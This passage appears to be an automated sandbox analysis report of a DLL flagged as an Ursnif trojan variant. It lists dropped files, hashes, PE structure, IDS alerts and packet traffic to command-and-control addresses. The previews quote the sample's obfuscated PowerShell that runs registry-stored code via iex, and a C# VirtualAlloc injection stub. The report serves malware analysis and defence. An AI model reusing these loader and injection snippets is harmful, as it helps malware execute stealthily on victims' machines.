                          MD5:BA975FCAFEA5BC2179880CE7E01A1CE9
                          SHA1:89AA86AEE421A044758CED62E646EC441E4D19AA
                          SHA-256:9CBC012D926A95136E9FD40E9C658E31C21CDB26E8B32A08B4AF800E87DD8393
                          SHA-512:F7FDF23A020418EE7AE7E7FBF41EB20F14E97BC3D8F8A6440AF87DF605374A779BD37467EA49E7957ECB4BC9AD996A2D026B0ED28F9360A88DE274F68D54786F
                          Malicious:false
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^_.b...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                          C:\Users\user\AppData\Local\Temp\b5khtopv.out

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):848
                          Entropy (8bit):5.323228230759943
                          Encrypted:false
                          SSDEEP:12:xKIR37Lvkmb6KHZWZE8RKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KH+E8RKaM5DqBVKVrdFAMBJTH
                          MD5:A0732BCB2CCDA94D5B47A60F929FDA61
                          SHA1:D0287555EE56BB8426AE01086C1DAAB0E0F4F236
                          SHA-256:AC734E3395B9C500CC77255FF2529DE39CB0A83D451B49D7569F5C2C69BAAF40
                          SHA-512:EB660C6A09D0566935FF383D15F6A68C0BD0F45D6ED35D7708913C9F4CFEF59CA4067BB52766BF798DF02292E41019A6CD004767FB628AF9BE44272CDAA44B1D
                          Malicious:false
                          Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b5khtopv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b5khtopv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                          C:\Users\user\AppData\Local\Temp\kikzslfg.0.cs

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):392
                          Entropy (8bit):4.988829579018284
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                          MD5:80545CB568082AB66554E902D9291782
                          SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                          SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                          SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                          Malicious:false
                          Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                          C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):351
                          Entropy (8bit):5.263922468747438
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxC10zxs7+AEszIWXp+N23fxCdx:p37Lvkmb6KHpC10WZE8pCdx
                          MD5:26231D50B2E9AE0CA2486C11856271F6
                          SHA1:D298368A287C8C654C2AD890F58E1101C89C6EA8
                          SHA-256:835E5B1E3D6F2806D2371B4160EACC27A46F424879338811A286CAC5D101BB9A
                          SHA-512:45534EB37809F3DBBF99142A0E0C72BF02C0715C39A05DA35955F112BA8AA167A05DCBE595D4A14A44D011190CA91BC6902D8B0C39B5E3AEDDAAEC208B65F239
                          Malicious:false
                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kikzslfg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kikzslfg.0.cs"

                          C:\Users\user\AppData\Local\Temp\kikzslfg.dll

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.5937782577305875
                          Encrypted:false
                          SSDEEP:24:etGStE/u2Bg85z7xlfwZD6BgdWqtkZfrOHWI+ycuZhNNVakSiaPNnq:6ttYb5hFCD6MWdJr11ulNVa3iWq
                          MD5:3D1BB357CA2468341DC1D0CD0CBDE50C
                          SHA1:E3012818931B5770C9EEE1842C196200084ED3B6
                          SHA-256:33F58C94D43F3F42D1A83E10568235E6BEB88B6A89634140390607FC845AF545
                          SHA-512:4D01A41FDBB5375DC04F659F6EE2499F0A3F27F650BE8F7CBCC7ED0136BE8D19CA31E003700B4D3B1F14AF6745AD9EB50AD4F82082FFFD9589DAF184790FBB6A
                          Malicious:false
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d_.b...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                          C:\Users\user\AppData\Local\Temp\kikzslfg.out

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):848
                          Entropy (8bit):5.323727982984064
                          Encrypted:false
                          SSDEEP:24:AId3ka6KHiE8EUKaM5DqBVKVrdFAMBJTH:Akka6AiE8dKxDcVKdBJj
                          MD5:38B9762A37D60558FC21EF41B824F2A0
                          SHA1:4E987BFAEC62799D5483B2E8F93A3020C751FC30
                          SHA-256:B946DFDE616FFF8EC403135CE6C2AE909E6A48C983880262A3307DC9140F69AA
                          SHA-512:6FEB9920BB44D00C561F65DD97E3FA15AF546ACEC2B5656F6DF711F1FB03073F9289265F83ED7DCE5364B94AEC7D28AFB1F78F16D4F61353547841EF80B6D914
                          Malicious:false
                          Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kikzslfg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kikzslfg.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                          C:\Users\user\Documents\20220526\PowerShell_transcript.530978.TCpPiQsC.20220526040704.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1367
                          Entropy (8bit):5.3900988864716135
                          Encrypted:false
                          SSDEEP:24:BxSA/DoCxvBnKx2DOXUW/pvLCHcKo4qWFHjeTKKjX4CIym1ZJXnDfpvLCHcKo4AO:BZ/c+vhKoOfpMlo4tFqDYB1ZJrpMlo4P
                          MD5:AEBC39EB79C9C79BE09DC92C39A235C9
                          SHA1:68CD50B3E46C3D14867EA2E6C7B2CFF6AF055B18
                          SHA-256:4E4703A45109ADCD12197DDC332C84B45AFCA38DDE5B515A31CB93F31D694F65
                          SHA-512:4E2E2D52A15D894753F12CBEAEA480C3787D30888CBDC2957688617DD2C4A1E442290E86E4E8678A262762B1564C679046BDA7FE48ED5F4AFA866F2F1232A91B
                          Malicious:false
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220526040705..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 530978 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6564..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220526040705..**********************..PS>new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftd

                          Static File Info

                          General

                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.281218339920859
                          TrID:
                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                          • Generic Win/DOS Executable (2004/3) 0.20%
                          • DOS Executable Generic (2002/1) 0.20%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:lokvQRcUe0.dll
                          File size:438272
                          MD5:5de5e3440620950f0be99fc6728c7afe
                          SHA1:43cbdfe6773ce518847b89f177a555e6bece283b
                          SHA256:2d83e172a42b032b32606b203f2a1a9736acfd86e76ede8ff57b3292c035d139
                          SHA512:674a545d51127efec4ad74ff97d6836a5a7c3f6c186de5a0be18bd1c619de4ffcd166409f52624b046ce4e48a0c432c2e19f6008741b8f117434229121f05c0e
                          SSDEEP:6144:SKmLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:SsBUSzjLIRBMkf9dHLpKepKr6CvXG
                          TLSH:1C94F14897685D66D84647370CE1931EFCE7FE2EE63B7ABE20642C8FF95B0104516B0A
                          File Content Preview:MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich...

                          File Icon

                          Icon Hash:9068eccc64f6e2ad

                          Static PE Info

                          General

                          Entrypoint:0x401520
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x3EC34607 [Thu May 15 07:47:19 2003 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:8000dfa78ad003480e4532227762516a

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          inc edx
                          add ecx, FFFFFFFFh
                          call 00007F5484979D7Ah
                          pop eax
                          pop eax
                          mov dword ptr [004136F4h], eax
                          mov edx, dword ptr [00413810h]
                          sub edx, 00005289h
                          call edx
                          mov eax, ebx
                          mov dword ptr [004136F0h], eax
                          mov eax, esi
                          mov dword ptr [004136E8h], eax
                          mov dword ptr [004136F8h], ebp
                          mov dword ptr [004136ECh], edi
                          add dword ptr [004136F8h], 00000004h
                          loop 00007F5484979D27h
                          mov dword ptr [ebp+00h], eax
                          nop
                          nop
                          mov ah, 03h
                          sbb byte ptr [ebp+6Fh], FFFFFF82h
                          and dword ptr [ecx+0Bh], esp
                          out D4h, al
                          or cl, byte ptr [esi]
                          mov eax, dword ptr [0B7E1EADh]
                          in eax, dx
                          shr dword ptr [edi-49h], 1
                          push ebx
                          movsd
                          jmp 00007F540FFF410Bh
                          imul dh
                          mov eax, dword ptr [F34D615Bh]
                          call 00007F5417E6CD1Ch
                          xlatb
                          pop esp
                          cmp dl, dh
                          salc

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd8a00x8c.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x9f28.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x6b0000xf3c.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xd0000x7c.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xb8c00xc000False0.0830485026042data1.12968558601IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0xd0000xbea0x1000False0.286865234375data4.80937731513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xe0000x7b800x6000False0.380004882812data5.99890283293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .crt0x160000x1dc010x1e000False0.988452148437data7.98104004555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .erloc0x340000x2c91e0x2d000False0.988232421875data7.98142116636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rsrc0x610000x9f280xa000False0.602783203125data6.51666400073IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                          .reloc0x6b0000x133a0x2000False0.218994140625data3.75989927364IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_BITMAP0x613600x666dataEnglishUnited States
                          RT_ICON0x619c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x662280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                          RT_ICON0x687d00xea8dataEnglishUnited States
                          RT_ICON0x696780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x69f200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_DIALOG0x6a4880xb4dataEnglishUnited States
                          RT_DIALOG0x6a5400x120dataEnglishUnited States
                          RT_DIALOG0x6a6600x158dataEnglishUnited States
                          RT_DIALOG0x6a7b80x202dataEnglishUnited States
                          RT_DIALOG0x6a9c00xf8dataEnglishUnited States
                          RT_DIALOG0x6aab80xa0dataEnglishUnited States
                          RT_DIALOG0x6ab580xeedataEnglishUnited States
                          RT_GROUP_ICON0x6ac480x4cdataEnglishUnited States
                          RT_VERSION0x6ac980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                          Imports

                          DLLImport
                          ADVAPI32.dllEnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount
                          msvcrt.dllfgetwc, strcoll
                          USER32.dllGetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn
                          GDI32.dllGetCharWidthFloatA, GetTextMetricsW, ExtEscape
                          OLEAUT32.dllLoadTypeLibEx
                          KERNEL32.dllGetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree

                          Version Infos

                          DescriptionData
                          LegalCopyright A Company. All rights reserved.
                          InternalName
                          FileVersion1.0.0.0
                          CompanyNameA Company
                          ProductName
                          ProductVersion1.0.0.0
                          FileDescription
                          OriginalFilenamemyfile.exe
                          Translation0x0409 0x04b0

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          192.168.2.313.107.42.1649743802033203 05/26/22-04:06:31.790854TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974380192.168.2.313.107.42.16
                          192.168.2.3176.10.119.6849752802033204 05/26/22-04:06:53.058632TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975280192.168.2.3176.10.119.68
                          192.168.2.3176.10.119.6849752802033203 05/26/22-04:06:53.058632TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975280192.168.2.3176.10.119.68

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 26, 2022 04:06:52.060287952 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.072685957 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.072798014 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.073632002 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.086468935 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.343399048 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.343425989 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.343440056 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.343517065 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.343854904 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.343890905 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.343904972 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.343909979 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.343935013 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.344276905 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.344316006 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.344330072 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.344345093 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.344388962 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.344424963 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.344470024 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.344547987 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.344567060 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.344579935 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.344593048 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.344623089 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.344721079 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.344774008 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.356909990 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357070923 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.357367039 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357388973 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357405901 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357419014 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357441902 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.357506037 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.357597113 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357635975 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357647896 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.357669115 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357677937 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.357682943 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357709885 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.357840061 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357858896 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357875109 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.357887983 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.357920885 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.357949018 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358002901 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358036041 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358050108 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.358055115 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358068943 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358078003 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.358117104 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.358325958 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358365059 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358388901 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.358405113 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358416080 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.358417988 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.358447075 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.370215893 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.370299101 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.371227980 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371252060 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371268034 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371328115 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.371368885 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371383905 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371387005 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.371428967 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.371567965 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371601105 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371619940 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.371623993 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371646881 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.371887922 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371906996 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371923923 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371941090 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.371942997 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371956110 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371973991 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.371975899 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.371992111 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.372004032 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.372023106 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.372050047 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.372210026 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.372240067 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.372258902 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.372260094 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.372272968 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.372286081 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.372330904 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.382575989 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.382766008 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.383284092 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.383305073 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.383322954 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.383338928 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.383352995 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.383368969 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.383416891 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.384627104 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.384645939 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.384656906 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.384722948 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.384936094 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.384954929 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.384973049 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.384990931 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.384999037 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.385009050 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.385026932 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.385039091 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.385065079 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.385107040 CEST4975280192.168.2.3176.10.119.68
                          May 26, 2022 04:06:52.385507107 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.385529995 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.385545969 CEST8049752176.10.119.68192.168.2.3
                          May 26, 2022 04:06:52.385557890 CEST4975280192.168.2.3176.10.119.68
